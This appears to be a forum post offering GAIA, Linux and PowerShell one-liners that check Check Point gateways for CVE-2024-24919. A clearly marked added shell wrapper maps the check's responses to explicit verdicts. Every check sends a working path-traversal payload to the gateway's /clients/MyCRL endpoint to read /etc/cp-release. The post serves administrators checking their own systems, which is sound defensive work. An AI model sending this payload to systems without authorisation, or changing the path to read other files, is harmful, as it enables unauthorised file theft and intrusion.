HeikoAnkenbrand
Champion

ONELINER - Check CVE-2024-24919 Vulnerability

Run this one-liner to check if your Check Point Gateway is vulnerable to CVE-2024-24919 (sk182336).
GAIA gateways and SMB gateways are supported.

1)  Depending on where you want to run the one-liner, you can copy and paste the code for GAIA, Linux or PowerShell.
     Copy the code into the CLI.

1a) GAIA version for expert mode:

 

clear; echo -e "CVE-2024-24919 check tool by Heiko Ankenbrand 2024\n\n";read -p "Destination IP: " ip_addr; curl_cli --connect-timeout 5 -s -k -X POST -H "Content-Type: text/plain" -d "aCSHELL/../../../../../../../etc/cp-release" "https://$ip_addr/clients/MyCRL" | awk ' {if (index($0, "Check Point") != 1) {print "\nNo vulnerability could be detected!"} else {print "\nAttention! \nThis system is vulnerable to CVE-2024-24919. More read here sk182336."}}' |sort | uniq ; echo -e "\n"

 

1b) Linux version (all other linux distributions):

 

clear; echo -e "CVE-2024-24919 check tool by Heiko Ankenbrand 2024\n\n";read -p "Destination IP: " ip_addr; curl --connect-timeout 5 -s -k -X POST -H "Content-Type: text/plain" -d "aCSHELL/../../../../../../../etc/cp-release" "https://$ip_addr/clients/MyCRL" | awk ' {if (index($0, "Check Point") != 1) {print "\nNo vulnerability could be detected!"} else {print "\nAttention! \nThis system is vulnerable to CVE-2024-24919. More read here sk182336."}}' |sort | uniq ; echo -e "\n"

 

1c) Windows PowerShell version:

 

clear;$C="";$O="";[System.Net.ServicePointManager]::ServerCertificateValidationCallback = {$true};Add-Type -AssemblyName Microsoft.VisualBasic;$IP_addr = [Microsoft.VisualBasic.Interaction]::InputBox("This is a test tool to check if your Check Point Gateway is vulnerable to CVE-2024-24919.`r`n`r`n`r`nDestination IP:", "CVE-2024-24919 check tool by Heiko Ankenbrand 2024", "");try{$C=(Invoke-WebRequest -Uri "https://${ip_addr}/clients/MyCRL" -Method POST -Body "aCSHELL/../../../../../../../etc/cp-release" -TimeoutSec 5 )} catch [System.Net.WebException] { if([int]$_.Exception.Response.StatusCode -eq 404) {$O="`r`nNo vulnerability could be detected!`r`n" } else {$O="`r`nGateway is not reachable!`r`n"} };  if ($C.StatusCode -match "200") {$O="`r`nNo vulnerability could be detected!`r`n"; if ($C.content -match "Check Point")  {$O="`r`nAttention! `r`nThis system is vulnerable to CVE-2024-24919. More read here sk182336.`r`n"}};Add-Type -AssemblyName System.Windows.Forms; $result = [System.Windows.Forms.MessageBox]::Show($O, "CVE-2024-24919 check tool by Heiko Ankenbrand 2024", [System.Windows.Forms.MessageBoxButtons]::OK, [System.Windows.Forms.MessageBoxIcon]::None)

 

2) Now enter the IP address of the gateway to be checked.

GAIA/Linux:
[Screenshot: cve_33_5345345.jpg]

PowerShell:
[Screenshot: PS_TT_5345345345.jpg]

If the following message appears, your system is vulnerable:

Attention!
The system is vulnerable to CVE-2024-24919.
More read here sk182336.

If the following message appears, your system is not vulnerable:

No vulnerability could be detected!

If no output appears, the system is not reachable.

---

Version:
1.5    06/02/2024    PowerShell interactive version with windows
1.4    06/01/2024    PowerShell version with correct status codes
1.3    06/01/2024    Linux and PowerShell version provided
1.2    05/30/2024    error with SMB applications fixed
1.1    05/29/2024    fixed error with output
1.0    05/28/2024    first version

➜ CCSM Elite, CCME, CCTE ➜ www.checkpoint.tips
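Added example, not part of the original post or the author's tool: the GAIA/Linux one-liner prints nothing when the gateway cannot be reached, so this sketch turns the same check into explicit verdicts that a script can act on. The function names (`classify_response`, `check_gateway`, `demo`), the `INCONCLUSIVE` verdict and the sample response bodies are assumptions made for this example.

```shell
#!/bin/sh
# Added example (not from the original post): explicit verdicts for the check.

# classify_response CURL_EXIT HTTP_STATUS BODY_FILE -> prints one verdict word.
classify_response() {
    local curl_exit="$1"
    local http_status="$2"
    local body_file="$3"
    # curl itself failed (timeout, refused, TLS) or produced no HTTP status.
    if [ "$curl_exit" -ne 0 ] || [ -z "$http_status" ] || [ "$http_status" = "000" ]; then
        echo "UNREACHABLE"
    # Same test as the awk one-liner: a line that starts with "Check Point".
    elif [ "$http_status" = "200" ] && grep -q '^Check Point' "$body_file"; then
        echo "VULNERABLE"
    # 200 without the marker, or 404 (as in the PowerShell version).
    elif [ "$http_status" = "200" ] || [ "$http_status" = "404" ]; then
        echo "NOT_VULNERABLE"
    else
        # Assumption of this example: any other status gives no verdict.
        echo "INCONCLUSIVE"
    fi
}

# check_gateway IP: sends the same request as the one-liner, then classifies it.
check_gateway() {
    local body status rc=0
    body=$(mktemp) || return 1
    status=$(curl --connect-timeout 5 -s -k -X POST -H "Content-Type: text/plain" \
        -d "aCSHELL/../../../../../../../etc/cp-release" \
        -o "$body" -w '%{http_code}' "https://$1/clients/MyCRL") || rc=$?
    classify_response "$rc" "$status" "$body"
    rm -f "$body"
}

# Offline demo on constructed responses (no network traffic is generated).
demo() {
    local f
    f=$(mktemp) || return 1
    printf 'Check Point Gaia RXX.YY\n' > "$f"; classify_response 0 200 "$f"
    printf '<html>Not Found</html>\n' > "$f";  classify_response 0 404 "$f"
    : > "$f";                                  classify_response 28 000 "$f"
    rm -f "$f"
}
demo
```

To check a gateway you administer, call `check_gateway` with its IP address; the verdict word can then be fed into a patch-tracking script or a monitoring check.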